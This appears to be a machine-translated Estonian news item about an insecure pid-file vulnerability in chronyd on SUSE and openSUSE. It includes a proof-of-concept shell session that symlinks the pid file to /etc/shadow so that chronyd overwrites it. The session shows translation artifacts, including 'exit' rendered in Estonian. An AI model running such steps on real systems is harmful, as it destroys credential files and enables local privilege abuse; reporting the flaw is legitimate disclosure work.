В
Haavatavuse põhjuseks on pid-faili ebaturvaline loomine, mis loodi staadiumis, mil chrony ei olnud veel õigusi lähtestanud ja töötas administraatorina. Sel juhul loodi /run/chrony kataloog, kuhu pid-fail on kirjutatud, õigustega 0750 läbi systemd-tmpfiles või siis, kui chronyd käivitati koos kasutaja ja rühmaga “chrony”. Seega, kui teil on juurdepääs kasutajale chrony, on võimalik pid-fail /run/chrony/chronyd.pid asendada sümboolse lingiga. Sümboolne link võib osutada mis tahes süsteemifailile, mis chronyd käivitamisel üle kirjutatakse.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ väljumine
root# /usr/sbin/chronyd -n
^C
# faili /etc/shadow sisu asemel salvestatakse chronyd protsessi ID
root# cat /etc/shadow
15287
Haavatavus
SUSE ja openSUSE probleem
Allikas: opennet.ru